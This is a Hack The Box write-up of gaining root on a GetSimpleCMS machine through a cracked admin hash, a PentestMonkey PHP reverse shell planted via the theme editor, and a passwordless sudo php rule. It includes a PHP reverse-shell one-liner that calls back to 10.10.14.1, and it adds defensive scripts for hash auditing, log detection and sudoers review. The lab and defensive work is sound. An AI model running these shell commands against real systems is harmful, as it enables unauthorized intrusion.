R.A.V.E.N. Exploit Walkthrough: Rooting GetSimpleCMS via Theme Template Injection

Brad Harris

Welcome to another breakdown in the R.A.V.E.N. series — a branded, modular approach to privilege escalation. Today, we're dissecting a black box engagement on HTB’s “GetSimple” machine, where remote exploitation leads to root access through theme template manipulation in a flat-file CMS.


Reconnaissance: Mapping the Terrain

Our initial scans painted a predictable picture:

  • nmap flagged open ports: 22 (OpenSSH) and 80 (Apache httpd).

  • nikto discovered /data/users/admin.xml, a world-readable file containing a password hash.

  • gobuster confirmed relevant directories: /admin/, /data/.

  • curl scraping gave no extra intel in the source code.

Credentials Unearthed

Extracted hash:

d033e22ae348aeb5660fc2140aec35850c4da997

Cracked with Hashcat using rockyou:

echo 'd033e22ae348aeb5660fc2140aec35850c4da997' > hash.txt
hashcat -m 100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

Result: admin:admin
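Why the hash fell in seconds: the exposed value is an unsalted SHA-1 of a default password, so a defender auditing their own install can recognise it without any wordlist at all. The script below is an added example, not code from the write-up or from GetSimpleCMS; the list of default passwords is constructed for the example, and the PBKDF2 scheme is shown only to contrast a salted, iterated hash with the bare SHA-1 found in admin.xml.

```python
import hashlib
import hmac
import os
from typing import Optional

# Hash recovered from the exposed /data/users/admin.xml in the write-up above.
EXPOSED_HASH = "d033e22ae348aeb5660fc2140aec35850c4da997"

# Constructed list of vendor/default credentials an administrator should test
# their own users file against (an audit list, not a cracking wordlist).
DEFAULT_PASSWORDS = ["admin", "password", "changeme", "getsimple"]


def unsalted_sha1(password: str) -> str:
    """Plain SHA-1 of the password, the format found in the exposed file."""
    return hashlib.sha1(password.encode()).hexdigest()


def matches_default(stored_hash: str, candidates=DEFAULT_PASSWORDS) -> Optional[str]:
    """Return the default password whose unsalted SHA-1 equals stored_hash, else None.

    Unsalted SHA-1 makes this a handful of digest computations: the same
    property that let rockyou + hashcat recover it instantly."""
    for pw in candidates:
        if hmac.compare_digest(unsalted_sha1(pw), stored_hash):
            return pw
    return None


def hash_password_pbkdf2(password: str, salt: Optional[bytes] = None,
                         iterations: int = 600_000) -> str:
    """Salted, iterated hash. The per-user salt defeats precomputed tables and
    the work factor makes bulk offline guessing expensive; compare with SHA-1,
    which has neither property."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_pbkdf2(password: str, stored: str) -> bool:
    """Recompute the derived key from the stored salt/iterations and compare."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("default credential hit:", matches_default(EXPOSED_HASH))
    stored = hash_password_pbkdf2("admin")
    print("salted hash:", stored)
    print("verify correct/wrong:", verify_pbkdf2("admin", stored), verify_pbkdf2("wrong", stored))
```

Run it against the hash from admin.xml and `matches_default` returns `admin` immediately; the same password stored with `hash_password_pbkdf2` produces a different string on every install and cannot be recognised by lookup.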

Initial Foothold: Bypassing Upload Restrictions

Login access to /admin yielded no direct file upload functionality — and GetSimpleCMS refused to parse PHP within page content. Enter the workaround: using the Theme Editor.

  • Injected PentestMonkey's PHP reverse shell into a .php file under the active theme.

  • With a netcat listener (nc -lnvp 5555) running, a quick page refresh dropped us into the box.
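Both the recon phase (nikto pulling /data/users/admin.xml) and the foothold (a theme-editor write followed by a fetch of a new .php under the theme directory) leave a recognisable trail in the Apache access log. The detector below is an added example, not part of the write-up or of GetSimpleCMS; the log lines are constructed, and the theme-editor path (/admin/theme-edit.php), the theme directory layout (/theme/<name>/) and the allow-list of legitimate template files are assumptions about the install that should be adjusted to the deployed theme.

```python
import re

# Constructed Apache combined-format lines for the example; none come from the page.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /data/users/admin.xml HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Nikto/2.1.6)"
10.0.0.9 - - [01/Jan/2024:10:01:10 +0000] "POST /admin/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:02:30 +0000] "POST /admin/theme-edit.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:02:45 +0000] "GET /theme/Innovation/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:03:00 +0000] "GET /theme/Innovation/template.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed install-specific values: the editor endpoint and the template files
# that legitimately exist in the theme. Any other .php under /theme/ is suspect.
THEME_EDITOR = "/admin/theme-edit.php"
KNOWN_THEME_FILES = {"template.php", "functions.php", "header.inc.php", "footer.inc.php"}


def classify(entry: dict) -> list:
    """Return the alert reasons raised by one parsed log entry."""
    alerts = []
    path = entry["path"].split("?", 1)[0]
    if path.startswith("/data/"):
        # The flat-file data store (users, pages) must never be served over HTTP.
        alerts.append("flat-file data dir served over HTTP")
    if path == THEME_EDITOR and entry["method"] == "POST":
        alerts.append("theme editor write")
    if path.startswith("/theme/") and path.endswith(".php") \
            and path.rsplit("/", 1)[-1] not in KNOWN_THEME_FILES:
        alerts.append("unexpected PHP file under theme dir")
    return alerts


def analyze(log_text: str) -> list:
    """Scan a log, returning (ip, severity, reason, path) tuples.

    A client that wrote through the theme editor and then requested a .php
    file not in the allow-list is escalated to high: that sequence is the
    theme-injection pattern used in the write-up."""
    findings = []
    edited_from = set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        for reason in classify(e):
            severity = "medium"
            if reason == "theme editor write":
                edited_from.add(e["ip"])
            elif reason == "unexpected PHP file under theme dir" and e["ip"] in edited_from:
                severity = "high"
            findings.append((e["ip"], severity, reason, e["path"]))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(*finding)
```

The hardening counterpart to the first rule is to deny HTTP access to /data/ entirely (an Apache `Require all denied` on that directory); the detector then also tells you whether anyone probed it before the fix.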

Shell Upgrade

TTY was unstable post-access, so we upgraded it:

python3 -c 'import pty; pty.spawn("/bin/bash")'

And just like that — user.txt found in /home/<user>.

Privilege Escalation: The Hidden Misconfig

Standard enumeration with LinEnum revealed a gem:

User can sudo /usr/bin/php without password

Root payload:

sudo /usr/bin/php -r '$sock=fsockopen("10.10.14.1",4444);$proc=proc_open("/bin/sh -i",array(0=>$sock,1=>$sock,2=>$sock),$pipes);'

Reverse shell listener:

nc -lnvp 4444

And boom — root.txt retrieved.
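The sudoers rule LinEnum surfaced is the kind of entry an administrator can catch in a routine audit: any NOPASSWD grant on an interpreter is effectively a passwordless root shell, whatever the intended use. The auditor below is an added example, not from the write-up or from LinEnum; the sudoers text is constructed (the username is a placeholder, not the box's user), and the set of shell-capable binaries is an assumed starting list to extend from your own baseline.

```python
import re

# Constructed sudoers content mirroring the misconfiguration reported above.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed example)
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
webuser ALL=(ALL) NOPASSWD: /usr/bin/php
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart apache2
"""

# Binaries that can execute arbitrary code or spawn a shell when run as root.
# Assumed list for the example.
INTERPRETERS = {"php", "python", "python3", "perl", "ruby", "node",
                "bash", "sh", "vim", "find", "awk"}

# user  host=(runas) [TAG: ...] command[, command...]
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)


def audit_sudoers(text: str) -> list:
    """Return findings for sudo rules that hand an interpreter to a user.

    NOPASSWD rules are rated critical because no credential stands between
    the user and a root shell; password-protected ones are still high."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD" in m["tags"]
        for cmd in m["cmds"].split(","):
            cmd = cmd.strip()
            if cmd == "ALL":
                continue  # full sudo; reviewed separately from interpreter grants
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in INTERPRETERS:
                findings.append({
                    "user": m["who"],
                    "runas": m["runas"],
                    "command": cmd,
                    "nopasswd": nopasswd,
                    "severity": "critical" if nopasswd else "high",
                })
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f['severity']}: {f['user']} may run {f['command']} as {f['runas']}"
              f"{' without a password' if f['nopasswd'] else ''}")
```

On a live host, feed it the output of `sudo -l` parsed the same way, or run it over `/etc/sudoers` and `/etc/sudoers.d/*` from a configuration-management check so the rule is caught at deploy time rather than by the next person to run LinEnum.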

Key Takeaways

  • Flat-file CMSs like GetSimple don’t rely on databases, which shifts your attack surface.

  • No file uploads? Try theme injection.

  • Don’t ignore hashed credentials in public-facing XML.

  • Sudo misconfigurations can be gold — run sudo -l religiously.



Written by Brad Harris

I am extremely passionate about staying updated and enhancing my skills to safeguard any organizations' assets in the dynamic cloud computing environment.